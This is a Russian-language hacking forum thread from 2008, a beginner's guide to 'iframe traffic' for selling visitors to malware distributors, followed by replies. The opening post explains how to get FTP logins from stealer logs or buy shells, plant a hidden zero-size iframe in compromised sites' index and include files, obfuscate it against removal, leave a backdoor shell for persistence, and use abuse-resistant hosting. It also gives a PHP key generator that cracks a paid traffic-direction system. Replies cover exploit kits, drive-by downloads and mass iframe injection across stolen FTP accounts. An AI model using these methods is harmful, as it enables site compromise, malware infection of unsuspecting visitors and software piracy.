Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   Iframe Трафик для новичков (https://forum.antichat.xyz/showthread.php?t=58641)

Sharingan 14.01.2008 21:13

Iframe Трафик для новичков
 
И так вот я решил написать статью про Трафик, сразу скажу, это моя первая
статья, так что не судите строго...
В этой статье я буду говорить о Iframe трафике.

Общее о трафике:
Трафик В сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей
за оределённый промежуток времени (обычно за сутки). (c) Википедия
Трафик Бывает 2х типов
1)Ифрейм Трафик
2)Трафик для СЕО
Ифрейм (Iframe) трафик это трафик зачастую использующийся для хек целей,
таких как загрузки.
СЕО же трафик используеться для раскрутки ресурсов.
Подробнее о СЕО можете прочитать тут
Трафик разделяется по странам
самые востребованные это AU-Австралия US-США UK-Великобритания DE-Германия IT-Италия
Сокращения о всех странах можно найти тут Трафик Бывает Бизнес и обычный, тут думаю объяснять не надо...
Так же очень популярно сейчас продавать Микс трафик, микс трафик это трафик состоящий из
трафика который идет с различных Стран, но все же большую ценность представляет трафик Отдельных стран
(За исключением Стран Бывшего СССР, Азии итп)

Зачем нужен трафик?
Как я писал выше Iframe трафик используеся для хек целей.
В основном для Загрузок (о них я напишу позже)
Ни для кого не секрет что Загрузки и Трафик являются одним из самых популярных
способов Хек заработка, на любом сайте с разделом Купля продажа (на тему Компьютерной Безопасности)
можно увидеть посты типа "Продаю Траф","Качественные загрузки","Куплю Uk траф или загрузы"
И как можно Увидеть такие вещи стоят прилично (по крайней мере для новичков в этом деле)
Несмотря на большое количество продавцов Трафика на него всегда есть спрос.
И если вы начнете заниматься продажами трафика у вас всегда будет работа, и деньги ;)

Как его добыть ?
Добывается трафик по разному:
1)С ломаных Сайтов
2)С белых ресурсов
3)С Доров
4)со спам рассылок
Iframe трафик добываеться лишь первым методом.
Опять же в разделах купля продажа вы можете увидить сообщения типа "Куплю Фтп","Продам Фтп","Скупаю Шеллы"
Итак вы наверное уже поняли что бы иметь трафик надо иметь фтп или шеллы
Думаю что такое FTP доступ вы знаете, а про шелл поподробнее можете прочитать тут
И так Как же нам достать Фтп или шеллы, Ну это уже зависит от вас, Самые известные способы
это снимать ftp с отчетов Пинча или покупать, а с шеллами все сложнее, это уже нужно иметь навык в SQL и PHP
инъекциях. Да но если вы это не умете, не стоит сразу вариант с шеллом оставлять до лучших времен...

Что делать с Этими FTP и Шеллами О_о
Ну теперь я поведаю вам великую тайну, что такое iframе,
IFrame - "плавающий" или встроенный фрейм. Iframe позволяет нам вставить один html(php)-документ в другой html(php)-документ.
Ну это все заумные понятия, объясню по быстрому, ифрейм в хеке это код который вписывается в страницу сайта (какую либо, зачастую в индекс)
что бы все зашедшие на сайт юзеры заходили параллельно на другой ресурс (который указан во фрейме), при этом не ведая этого ))
Вообщем объяснил как смог, без заумных слов. Пример ифрейма:
Код:

<iframe src="http://yoursite.ru/tds/index.php" width="0" height="0" frameborder="0"></iframe>
И так разберем его по кускам
< - тег начала кода
iframe src="http://yoursite.ru/tds/index.php" - именно тут указывается куда будут заходить параллельно посетители, кавычки обязательны!
width="0" height="0" frameborder="0" - это тоже неотъемлемая часть ифрейма, означает что длина высота = 0, а фреймбордер убирает границу фрейма
Благодаря этим параметрам фрейм на странице абсолютно на заметен, как бы ты не приглядывался ))
</iframe> - Конец фрейма
Итак когда рассмотрели что такое ифрейм, разберем что же с этим чудесным кодом делать?
Допустим вы уже Добыли ФТП и теперь можете на него зайти, что бы иметь трафик нужно поставить фрейм
вы заходите на фтп (НЕЗАБЫВАЙТЕ О БЕЗОПАСНОСТИ ЮЗАЙТЕ ПРОСКСИ, СОКСЫ ИЛИ ВПН) заходите в директорию
где расположен сайт, обычно это htdocs www или папка с именем домена типа - name.ru
Зашедши в папку вы видите множество файлов, выбираете файл index или в редких случаях home, main.. файл может быть
как с php так и html расширением. открываете его и вставляете ифрейм, с названием
Код:

<iframe src="http://yoursite.ru/tds/index.php" width="0" height="0" frameborder="0"></iframe>
где yoursite.ru это ваш файл tds/index.php это папка и файл куда будет идти трафик. Затем Сохраняете файл и вот у вас есть трафик!
Про шелл можно много рассказать, Вкратце шелл скрипт, который позволяет при наличии прав, редактировать файлы на фтп, и лазить по папкам
и еще мноооого чего другого не относящегося к этой теме. А редактирование для нас самое главное :)
Подробнее про шелл тут
З.Ы. чем больше посещаемость сайта тем больше трафика у вас...
Это Конечно хорошо что вы научились ставить фреймы, но это кажется напряжным, если клиент закажет менять фрейм, или ставить фрейм куда стекается траф
да и вообще так не удобно, НО у нас есть одна замечательная штука, называется она TDS (Traffic Direct System)

Что такое ТДС и с чем его едят?
ТДС - это система для управления трафиком.
Если говорить кратко, то ТДС это скрипт, в который сливается трафик из различных источников. Система распределяет полученный трафик следуя правилам установленным хозяином скрипта.
Таким образом хозяин получает полную статистику и полный контроль над всем своим трафиком из одного скрипта.
На данный момент существует много ТДС предоставлю пару бесплатных тдс
1)TDS от Kallisto
2)Advanced TDS
1я тдс имеет одну уязвимость, о том чего она касаеться и как исправить можно почитать на Вбх.
2я тдс является платной, но тут есть один небольшой ключик, качаете ее а затем в файл key.php прописываем следующее
Код:

<?php
  function genkey ($key)
  {
    $kx = 193;
    $kp = 149;
    $p = 0;
    $r = '';
    $p =0;
    $ps = 0;
    while ($p<= strlen ($key) - 1)
    {
      $d = $key[$p];
      $d=ord($d);
      $d=$d^$kx;
      $d = $d + $ps + $kp;
      $r= "000".$d.$r;
      ++$ps;
      $p++ ;
    }

    return $r;
  }
  $key=genkey($_SERVER['HTTP_HOST']);
?>

И получаем полностью рабочую ТДС )
Пара других ТДС тут
Как пользоваться ТДС тут я писать не буду, ибо получиться очень емкая статья, на данный момент лучшей тдс является Sutra TDS

Ну вот теперь казалось все есть для того что бы продавать трафик, но кажется чего то не хватает... ах да, хоста
куда будет сливаться трафик!

Хост
Ну думаю что такое хостинг и хост знают все, я лишь дам пару советов:
1)Лучше всего делать хост похожим на какой либо счетчик
или банерообменник или еще что что бы админ подумал что так надо, потому что много админов не делали свои сайты а лишь заказывали,
потому нужно ли оно или нет они не знают.
2)Покупайте Абузоустойчивый хост, он лучше всего, почему да потому что сколько бы админы не жаловались хостеру они все равно не накроют хост.

Ну вот теперь вы можете сделать свой сервис трафика = )
но желательно прочтите советы

Советы и FAQ
Совет :
Ифрейм часто палиться и админы ломаных майтов ругаются и если хост не абузоустойчивый то накрывается все дело, но
не строит расстраиваться, есть специальные программы обфускаторы (какое страшное слово) которые путают пхп код
Одной из них является TrueBug PHP Encoder
После обработки фрейма он будет выглядеть больше и более уродским, за то разгадать админы его не смогут, ну хотя
если захотеть то можно )

Вопрос : Почему когда я захожу на зафреймленый сайт то антивирус ругается?
Скорее всего потому что вы льете траф недобросовестному товарищу связка эксплойтов которого палиться

Вопрос : По счетчику на сайте 1000 посещений, а по ТДС мне сливаеться с сайта всего 100, в чем дело ?
Дело в том что если вы поставили фрейм только на индекс, то траф будет идти только с индекса, возможно на сайт
люди заходят через поиск и он выдает другую страницу не индекс, и потому трафа так мало.

Совет : Всегда бывает так что вы спалили доступ и пароль на ФТП вот вот поменяют, что в таком случае делать?
Всегда нужно оставлять запасной выход открытым (с)
Если ресурс реально того стоит что бы биться над ним, просто залейте куданибудь поглубже шелл, поставьте CHMOD 777 на него
и запишите адресс шелла в блокнотик, НО дело в том что зачастую шеллу не хватит прав что бы изменить индекс, в таком случае предварительно
вы должны изменить CHMOD индекса на 662, а лучше всего поставить еще и на Инклуды 662.

Вопрос : Вы там что то говорили про CHMOD и про Инклуды, что это?
CHMOD это разрешение различных групп пользователей делать читать и записывать что то в файл
подробнее про CHMOD можно почитать тут
Инклуд, это вызов какой либо страницы в другую, к примеру
вы читаете код странички index.php и видите
Код:

<? include ("banner.php");?>
вот тут означает что index.php берет код из страницы banner.php
то есть фактически <? include ("banner.php");?> в страничке заменяется на содержимое файла banner.php
и тем самым если вы можете поставить фрейм в баннер.пхп и он будет действовать в index.php
То есть если вы поставите фрейм в одном из инклудов, то его сложнее будет найти.

Вопрос : как запутать админа что бы он не удалил фрейм?
х3 честно говоря, но можно опять же в инклуде (желательно) или в индексе вставить Ифрейм, а затем выделить фрейм и кусочек кода сайта
вырезать и запихнуть в обфускатор, и потом обратно вставить, если Одмин удалит его то сайт запориться, и соответственно если админ Плуг
то он вставит обратно этот кусочек и будет так жить... но это только если он плуг.

Вопрос : Какие загрузки больше всего ценяться и почему?
Читай выше я писал, а почему, нуу, потому что Некоторые страны Банковские, там дофига банков и всё такое, или для других целей
и вообще какая тебе разница? продаешь так продавай)

Ну вот и все, про Загрузки я напишу в следующей статье, если эта будет Ачатовцам по душе...
Все замечания и исправления выслушаю с радостью )

c411k 15.01.2008 02:07

интересует что в конечном счете получает покупатель трафа с загрузками. - загруженый трой, это понятно, а дальше? пассы от различных платежек, мыла, фтп? нах? опиши как это в конце разгребается. и какую максимальную отдачу можно получить с загрузок. кому лучше продавать? расценки.

-=lebed=- 15.01.2008 02:18

Цитата:

Сообщение от c411k
интересует что в конечном счете получает покупатель трафа с загрузками. - загруженый трой, это понятно, а дальше? пассы от различных платежек, мыла, фтп? нах? опиши как это в конце разгребается. и какую максимальную отдачу можно получить с загрузок. кому лучше продавать? расценки.

Имхо статья больше написана от лица продавца трафа, а не покупателя, а что получает с загрузок покупатель, это уже зависит от того что грузится (а это может быть что угодно... и выходит за рамки написания этой статьи, кроме того ты уже сам обозначил вкратце) Самое простое, это то, что поначалу сам приходящий траф может идти на загрузку инструментов для его последующего увеличения = (акки фтп, админок и т.д. для последующего ифрейминга веб ресурсов).

keeberg 15.01.2008 02:26

Цитата:

2я тдс является платной, но тут есть один небольшой ключик, качаете ее а затем в файл key.php прописываем следующее
где находиться этот key.php ? чет я найти немогу....

Sharingan 15.01.2008 02:36

keeberg
Прости я перепутал, не ту ссылку запихнул, ща все изменил, жми на ссылку все ок будет, там скачаешь в архиве в мануале будет написано : Файл с лицензионным ключом (если он у вас есть). Возможно несколько положений на сервере: ./r_admin/config/key.php или ./r_admin/key.php или ./r_admin/key/key.php.

c411k
Ну если ты внимательно читал статью то там было написано
Цитата:

Как я писал выше Iframe трафик используеся для хек целей.
В основном для Загрузок (о них я напишу позже)
вообщем еще будет написана статья о загрузках, и там как раз будет написано что да как, просто реально как сказал Лебедь то оно выходит за пределы темы, да можно было объединить Траф и Загрузки, но подумав решил не делать ибо статья большая получилась бы, а народу и так влом читать много.... А еще я ведь мог бы не кидать ссылки на что такое СНМОД, а объяснять и про шеллы то же, просто я держусь в рамках темы

xdx 22.01.2008 18:46

толком ну сломал я сайт ну поставил я ифрейм на оут.пхп и какая польза будет мне.
только айпишники? ;D

inlanger 22.01.2008 19:16

Покупать траф можно для партнёрок, где платят с кликов. Или зарабатывать, как в статье написано. Пару сотен у.е. в месяц с этого можно иметь не напрягаясь.

xdx 22.01.2008 19:55

Мм объясните что воопще за за вид трафика такой? Это просто список айпи? Тех кто просто наткунлсо на страницу с ифреймом?

Дюша 22.01.2008 20:38

набивать себе счетчик епть, показывая этот счетчик можно обменяться ссылками более с развитыми сайтами..... или показывать какая посещаемая у тебя партнёрка....

Витян 22.01.2008 20:45

тдс направляет посетителей с сайтов где вписан твой iframe на нужный тебе сайт, это может быть и сплоит и просто для накрутки счётчика

xdx 22.01.2008 20:57

спасибо+ каждый день узнаешь что-то новое хотя и не очень =) кстати какие хосты для этого лучше всего прегодны?

Дюша 22.01.2008 21:00

Цитата:

кстати какие хосты для этого лучше всего прегодны?
которые хотябы html поддерживают

xdx 22.01.2008 21:15

я имею введу чтоб держать tds а он на php =) ну платный понятно какой чтоб такой Абузоустойчивый )

genom-- 22.01.2008 21:35

вообще неплохо -- для тех кому это темный лес -- очень даже познавательно
молодец -- еще могбы упомянуть связки различные и фарму

De1eT 15.02.2008 09:42

Цитата:

Сообщение от genom--
еще могбы упомянуть связки различные и фарму

вот только не надо все в кучу :)

Hawkins 15.02.2008 13:41

Мелкие косяки, ака хост-хостинг (видимо под одним из них подразумевался домен)
и подобные в каждом абзаце, но в целом на 4- тянет :)
Сутра тоже не идеальна, мне лично больше атдс нравилась, сутра не для продажи iframe трафа, там всё на кликах и дорах закручено )
Зато отдельный дедик + тдс на fast cgi скриптах = держат любое количество трафа.

ultimatum 15.02.2008 14:21

перенаправляемый траф можно использовать в качеств Doss атаки ?

aka PSIH 15.02.2008 14:37

Цитата:

Сообщение от ultimatum
перенаправляемый траф можно использовать в качеств Doss атаки ?

:) нет
у тебя траффика не хватит... ;)

WVBR 16.02.2008 01:25

Цитата:

Сообщение от xdx
Мм объясните что воопще за за вид трафика такой? Это просто список айпи? Тех кто просто наткунлсо на страницу с ифреймом?

"вид трафика" .. обычный
зашёл на античат + на сайт vasy.pupkin.nu

накрутка накрутка накрутка счётчиков, это самое важное это коренЬ всех плюсов
+ можно иметь деньги с партнерок платящих за показ рич баннеров
правда тут нужно не терять соотношений показов и кликов
+ показы баннеров, опять же - показы и клики дб в порядке а то быстро забанят)))

WVBR 16.02.2008 01:44

Да тема хорошая, но настолько становится популярна, и прибыльна., что в итоге имхо за фреймы 0x0 будут наказыватЬ в плотЬ до исключения ресурса, на котором сие установлено, из бд поисковиков...
как линк помойки ака запущенные ресурсы

это первое второе как логическое продолжение... минусов.. на каждом хостинге будет всё чаще - сейф моде + скан юзерского пространства на наличие шелов и вставок )))

2R0ck 17.02.2008 01:41

Sharingan За ключик к Advanced TDS отдельное спасибо!!!

Developer 17.02.2008 14:53

Не совсем понятно, какая из этого выгода кому-либо? Хакнул я 100 сайтов, скриптом модифицировал страницы (вставил iframe на свой хост), что дальше? Я вижу только пользу в накрутке счетчиков а-ля Mail и т.д. Ну еще баннерные показы должны считаться.

Объясните нубу.

Piflit 17.02.2008 15:29

Цитата:

Сообщение от ultimatum
перенаправляемый траф можно использовать в качеств Doss атаки ?

да

diehard 17.02.2008 16:13

Developer
ну продать можешь 100 сайтов похаканых мне например за wmz :)

Developer 18.02.2008 21:13

Я привел пример, ответа так и не услышал.

Просто приходилось на заказа писать скрипт, который проходил по базе хакнутых ФТП, искать корень, модифицировал странички и съепывал оттуда :) Вставки были iframe, база была примерно 500 фтп-шников :))) Правда больше половины негодных к тому моменту уже было. Но вопрос не в этом... Какая польза от траффика (читай мой пост выше) ?

.Slip 18.02.2008 21:51

трафик --> загрузки --> ботнет/spyware/adware/пончи всякие там
Вариантов много.

WVBR 19.02.2008 19:08

Цитата:

Хакнул я 100 сайтов, скриптом модифицировал страницы (вставил iframe на свой хост), что дальше?
раскажу, на конкретном примере. Примерно неделю назад, копал я один популярный девайс, нашёл уязвимость, проверил - работает на всех девайсах найденных гуглом и братьях его в сети... И что теперь делатЬ ? Ну естесно искатЬ выгоды...
для сего чутЬ позже был сделан скрипт который
- внедряет шел в диру с соответствующими провами
- вставляет фрейм + вставляет код вызова скрипта спам рассылки на индекс
- заливает сам скрипт спам рассылки с настроенным линком на базу с мылом и логами или заливает базу на текущий сервер (если сервер не поддерживает коннекты по фтп)

() фрейм подвязывает страницу со сплоитами для загрузки
() спам скрипт медленно делает своё дело...

вот вкратце что возможно сделатЬ если ты хакнул 100 сайтов

Developer 20.02.2008 15:17

Загрузки... Я нуб... Но разве можно юзера заставить скачать и запустить файл без его ведома?

.Slip 20.02.2008 15:20

Цитата:

Сообщение от Developer
Загрузки... Я нуб... Но разве можно юзера заставить скачать и запустить файл без его ведома?

Для этого используются связки эксплойтов под разные браузеры.

Впадлу в разделе Наши Статьи прокрутить колёсиком один раз, и заметить эту тему: http://forum.antichat.ru/thread58732.html

Или поиск для лохов?

Developer 20.02.2008 18:46

Цитата:

Для этого используются связки эксплойтов под разные браузеры.
Терь понятно :) То бишь имея траффик я не всегда смогу осуществлять загрузки, ибо не всегда и не у всех есть дыры в браузерах :)

.Slip 20.02.2008 19:01

Цитата:

Сообщение от Developer
Терь понятно :) То бишь имея траффик я не всегда смогу осуществлять загрузки, ибо не всегда и не у всех есть дыры в браузерах :)

Всегда. Всё ещё зависит от связки эксплойтов.

Вот тебе реальная статистика по трафу, дальше про пробив додумывай сам. Цифры всё говорят.
48317к. уников.

Статистика по браузерам (в тысячах):

» Opera9 7375
» FireFox2 10670
» IE7 11478
» IE6 15652

* Меньше 7к. не рассматривались

Статистика по ОС (в тысячах):

» MacOS 1049
» Windows2000 1334
» WindowsVista 3368
» WindowsXP 39209

* Меньше 1к. не рассматривались

Преимущественно .ру траф. Вот и думай про загрузки(:

XaCeRoC 26.02.2008 20:38

Такой вопрос у меня палился АВ некоторые файлы в связке я их обработал прогой
TrueBug PHP Encoder файлы палится перестали :), будут ли нормаль всё работать после того как я их закодировал??

n0ne 26.02.2008 23:21

XaCeRoC, есть только один способ - проверить:)

Sharingan 27.02.2008 00:47

Скорее всего будут, но то что АВ сам скрипты разобрать как вредные на компе не может, не значит что связка в действии АВом не будет палиться, как бы код не был зашифрован все равно он выполняеться и еси связка палилась то и будет палиться, выходи один модифицировать крипторы

XaCeRoC 27.02.2008 21:43

Нет не помогло при заходе на сайт с фреймом АВ сразу ругается... как ещё можно криптануть связку(IcePack 2007)??
ЗЫ: в темах куплю\продам\обменяю искал не чё похожего не нашол.

unixfan 14.03.2008 00:35

А у кого-нить какие-нибудь проблемы были от админов похаканных ресурсов? :)
а то, что-то всё о плюсах, да о плюсах... :)

unixfan 14.03.2008 00:37

Кстати, законом это ещё никак не пресекается? Или есть и на это законы какие-то, либо близкие?

Piflit 14.03.2008 00:52

272-274

unixfan 14.03.2008 06:31

Спасибо.

Скажите пожалуйста, а по какому принципу работает TrueBug PHP Encoder?
На PHP реально написать такую небольшую функцию который видоизменяет код (от читабельности), но, чтобы по-прежнему он остался работоспособным HTML кодом?

Grema 27.03.2008 18:06

хм, а кто-то может дать пару сайтов партнером или то че скупает траф?

только что пошарил. нашел сайт где скупают траф, так там такая заява:
Внимание! Попытка поставить нашу ссылку в iframe влечет за собой мгновенную блокировку учетной записи.

че скажите по этому поводу


Время: 05:40